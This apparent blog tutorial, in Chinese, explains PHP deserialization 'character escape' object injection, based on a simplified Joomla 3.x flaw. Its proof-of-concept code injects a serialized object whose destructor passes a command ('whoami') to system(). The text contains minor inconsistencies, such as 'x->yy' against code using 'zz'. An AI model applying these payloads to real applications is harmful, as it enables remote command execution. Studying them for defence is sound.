PHP字符逃逸导致的对象注入详解

最新推荐文章于 2021-08-13 11:46:38 发布
最新推荐文章于 2021-08-13 11:46:38 发布
阅读量468 收藏 1
点赞数
分类专栏: PHP 文章标签: 字符逃逸 对象注入 序列化

1.漏洞产生原因:

序列化的字符串在经过过滤函数不正确的处理而导致对象注入,目前看到都是因为过滤函数放在了serialize函数之后,要是放在序列化之前应该就不会产生这个问题

<?php

function filter($string){

  $a = str_replace('x','zz',$string);

   return $a;

}

$username = "tr1ple";

$password = "aaaaax";

$user = array($username, $password);

echo(serialize($user));

echo "\n";

$r = filter(serialize($user));

echo($r);

echo "\n";

var_dump(unserialize($r));

$a='a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";';

var_dump(unserialize($a));

php特性:

1.PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的

2.对类中不存在的属性也会进行反序列化

以上代码就明显存在一个问题,即从序列化后的字符串中明显可以看到经过filter函数以后s:6对应的字符串明显变长了

并且如果对于

a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";

这种字符串而言,也能够正常反序列化,说明php在反序列化的时候只要求一个反序列化字符串块合法即可,当然得是第一个字符串块。

以上代码为例,如果能够利用filter函数这种由一个字符变为两个字符的特性来注入想要反序列化后得到的属性,使其可以逃逸出更多可用的字符串,那么我们就能反序列化得到我们想要的属性

比如此时我们想要让反序列化后第二个字符串为123456,此时我们的payload如果和之前的username长度为a,则filter处理以后可能username就会变成a,此时我们的payload变成了新的注入的属性,此时反序列化后就会得到我们想要的结果。

比如a:2:{i:0;s:6:"tr1ple";i:1;s:6:"123456";}是我们想要达到的效果,此时我们想要注入的payload明显为:

";i:1;s:6:"123456";}

可以得到其长度为20

此时我们已经知道过滤的规则为x->yy,即注入一个x可以逃逸出一个字符的空位,那么我们只需要注入20个x即可变成40个y,即可逃逸出20个空位,从而将我们的payload变为反序列化后得到的属性值

$username = 'tr1plexxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}'; //其中红色就是我们想要注入的属性值 

$password="aaaaa";

$user = array($username, $password);

echo(serialize($user));

echo "\n";

$r = filter(serialize($user));

echo($r);

echo "\n";

var_dump(unserialize($r));

可以看到此时注入属性成功,反序列化后得到的属性即为123456

2.实例分析

joomla3.0.0-3.4.6 对象注入导致的反序列化,以下为参考别人的简易化核心漏洞代码

<?php

class evil{

    public $cmd;

    public function __construct($cmd){

        $this->cmd = $cmd;

    }

    public function __destruct(){

        system($this->cmd);

    }

}

class User
{

    public $username;

    public $password;

    public function __construct($username, $password){

        $this->username = $username;

        $this->password = $password;

    }

}

function write($data){

    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);

    file_put_contents("dbs.txt", $data);

}

function read(){

    $data = file_get_contents("dbs.txt");

    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);

    return $r;

}

if(file_exists("dbs.txt")){

    unlink("dbs.txt");  

}

$username = "tr1ple";

$password = "A";

$payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}'; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

 

在这里如果想要通过注入对象来实现反序列化则必须在外部对象内进行注入存在的属性,不能在其外部,否则php将不会进行我们注入恶意对象的反序列化

例如此时因为反序列化读取的时候将会将六位字符\0\0\0替换成三位字符chr(0)*chr(0),因此字符串前面的s肯定是固定的,那么s对应的字符串变少以后将会吞掉其他属性的字符,那么如果我们精心算好吞掉的字符长度,并且能够控制被吞掉属性的内容,那么就能够注入对象,从而反序列化其他类

比如如上所示,此时我们要注入的对象为evil,此时username和password的值我们可控,那么我们可以在username中注入\0,来吞掉password的值,比如

<?php

$a='\0\0\0';

echo strlen($a);

$b=str_replace('\0\0\0', chr(0).'*'.chr(0), $a);

echo strlen($b);

所以此时首先确定我们要吞掉的字符的长度

O:4:"User":2:{s:8:"username";s:6:"tr1ple";s:8:"password";s:4:"1234";}

正常情况下我们要吞掉 ";s:8:"password";s:4:" 为22位

但是因为注入的对象payload也在password字段,并且长度肯定是>=10的,因此s肯定是两位数,因此这里为22+1=23位字符

因为是6->3,因此每次添加一组\0\0\0能多吞掉3个字符,因此需要肯定都是3的倍数

因此我们假如这里构造username为

\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0

则经过read函数处理后长度将变为24

即此时能够多吞掉24个字符,为了不让其吞掉payload,我们可以填充1位字符A,即令password的值为A+payload即可

<?php

class evil{

    public $cmd;

    public function __construct($cmd){

        $this->cmd = $cmd;

    }

    public function __destruct(){

        system($this->cmd);

    }

}

class User
{

    public $username;

    public $password;

    public function __construct($username, $password){

        $this->username = $username;

        $this->password = $password;

    }

}

function write($data){

    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);

    file_put_contents("dbs.txt", $data);

}

function read(){

    $data = file_get_contents("dbs.txt");

    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);

    return $r;

}

if(file_exists("dbs.txt")){

    unlink("dbs.txt");  

}

$username = "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0";

$password = "A";

$payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}'; $shellcode=$password.$payload; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

 

执行结果如上图所示,将成功反序列化password属性所对应的值,其值即为我们注入的对象,整个过程也容易理解,就是吞掉后面的属性来注入属性,那么达到攻击有以下要求:

1.相邻两个属性的值是我们可以控制的

2.前一个属性的s长度可以发生变化,变长变短都可以,变短的话可以吞掉后面相邻属性的值,然后在相邻属性中注入新的对象,如果边长则可以直接在该属性中注入对象来达到反序列化

比如XNUCA2018 hardphp就考察了一个这个相关的trick

这里就出现了用前面的data在反序列化时向后吞一位字符,从而可以导致吞掉后面的普通用户的username字段,而在username字段可以放上我们想要伪造的username,从而达到伪造session的目的。

assasinSteven
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php序列化字符逃逸
m0_62422842的博客
03-30 3396
在了解php序列化漏洞后,我又进一步学习了字符逃逸的相关内容。这一部分相对来说是比较难理解的。
php序列化字符逃逸
qq_53856457的博客
05-14 1615
php序列化字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
php序列化逃逸学习笔记
weixin_44732566的博客
05-02 775
php序列化逃逸学习
php序列化字符逃逸
xiaolong22333的博客
10-31 2345
php在反序列化时,底层代码是以;作为字段的分隔,以}作为结尾,并且是根据长度判断内容 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 来看一段简单的代码 <?php $name=$_GET[name]; $id='hello'; $p=array($name,$id); echo test(serialize($p)); ?> 运行结果 加入一点过滤 <?php function test($str) { return preg_replace('/go
PHP序列化/对象注入漏洞分析
10-22
描述中的例子展示了如何利用PHP对象注入漏洞。在这个例子中,`unserialize()`函数被用来处理来自用户请求的`$_REQUEST['r']`参数。攻击者可以通过提供特制的序列化数据来控制`$var1`变量,进而执行任意代码。代码...
Python字符对象实现原理详解
01-21
在Python世界中将对象分为两种:一种是定长对象,比如整数,整数对象定义的...如上,整数对象所占用的内存都是28字节,和具体的值没关系,而同样都是字符对象,不同字符对象所占用的内存是不一样的,这就是变长对象
PHP实现字符串的全排列详解
10-17
在本篇文章里小编给大家整理了关于PHP实现字符串的全排列的相关知识点内容,需要的朋友们学习参考下。
php防止SQL注入详解及防范
12-19
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或转义用户输入,导致恶意构造的SQL语句被执行,从而可能泄露、修改或删除数据库中的敏感信息。PHP是Web开发中常用的脚本语言,因此理解如何在PHP中...
PHP中strtr字符串替换用法详解
10-25
主要介绍了PHP中strtr字符串替换用法,以大量实例详细解读了strtr字符串替换的用法与技巧,并与str_replace做了对比以加深理解,需要的朋友可以参考下
细说php序列化字符逃逸
蚁景网安学院
11-05 2622
亲爱的,关注我吧11/5文章共计4381个词预计阅读10分钟来和我一起阅读吧前言php序列化字符逃逸算是比较难理解的一个知识点,在最近的好几场比赛中都出现了相关的题,于是下定决心彻底...
PHP序列化-字符逃逸
bin789456的博客
08-13 413
写在前面 字符逃逸是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 摘要 普通PHP序列化漏洞是因为用户对反序列化过程可控造成的魔法方法弹出导致的漏洞,字符逃逸不仅可以在普通反序列化漏洞之上 ...
PHP序列化字符逃逸详解
qq_45521281的博客
07-05 7767
文章目录第一种情况:替换修改后导致序列化字符串变长例题——[0CTF 2016]piapiapia第二种情况——替换之后导致序列化字符串变短实例——[安洵杯 2019]easy_serialize_php 此类题目的本质就是改变序列化字符串的长度,导致序列化漏洞 这种题目有个共同点: php序列化后的字符串经过了替换或者修改,导致字符串长度发生变化。 总是先进行序列化,再进行替换修改操作。 第一种情况:替换修改后导致序列化字符串变长 示例代码: <?php function filter($st
命令模式的简单实现
落叶成冰
02-22 218
<?php // 命令模式 interface Command { public function execute(); } /** * concrete command, 具体的命令 */ class ConcreteCommand implements Command { private $receiver; public function __construct(Receiv
第12届全国大学生信息安全竞赛线上初赛Web场景 Write Up
AugenStern的博客
08-19 1079
Web安全题目JustSoso全宇宙最简单的SQLlove_mathRefSpace 题目 赛题类型主要包括:逆向、漏洞挖掘与利用、Web 渗透、密码、隐写、安全编程等类别,考察参赛者不同维度的网络安全理论、技术水平。 JustSoso 知识点:任意文件读取,PHP序列化 根据 html注释 结合 php伪协议 ,可以读取出 index.php 和 hint.php 的源代码。 http://xxx/index.php?file=php://filter/read/convert.base64-enc
------已搬运-------PHP序列化字符逃逸入门笔记
Zero_Adam的博客
02-02 448
放在最前面: 这是我拿来复习用的。您要是想学的话,请从 基础知识和一些特性 那里开始看起。 字符数变多的套路 解释 增多:。我们输入的时候少,加工后他会变多。 那么我们就在输入的时候再加上构造的。然后 变多之后,就把我们构造的给挤出来。从而实现 详细解释 一个字符串数量会变多的话,就把我们要构造的那一串序列化之后的字符串接到该变量的最后(记得那个序列化字符串,该闭合的都给闭合了)。然后添加了几个字符的数量 再加上他减少之后剩下的字符的数量要 === 他增多之后的总的数量,从而把我们构造的那些给 挤出去
PHP序列化时遇到一个奇怪的字符
qq_44927883的博客
11-26 305
本来想通过代码得到序列化,结果发现一个奇怪的东西 <?php class Name{ private $username = 'username'; private $password = 'password'; public function __construct($username,$password){ $this->username = $username; $this->password = $password;
DACTF—Ezunserialize
ro4lsc的博客
05-07 7485
DACTF—Ezunserialize(PHP序列化字符逃逸) 这个题是我在赛后再进行学习的,所以自己在本地复现了一下环境。 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function r...
php长文本怎么防sql注入,PHP怎么防sql注入
weixin_39631951的博客
03-09 76
防sql注入需要结合三方面来做:参数检查,包括参数合法性和长度校验,对于特殊字符,还需要做特殊字符处理数据库设计使用正确的数据类型,如果是字符类型,设定字符的长度使用预定义语句和参数化绑定数据php提供了MySQLi和PDO两种选择。MySQLi:$mysqli = new mysqli('localhost', 'user', 'password', 'user');$stmt = $mysql...
PHP+MySQL注入详解与防范策略
此外,提到PHP的magic_quotes_gpc设置可能会影响注入的复杂性,如当此选项开启时,部分特殊字符会被转义,增加了构造恶意SQL语句的难度。 文章接下来纠正了一个常见的误区,即许多人认为在PHP+MySQL环境下,必须...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值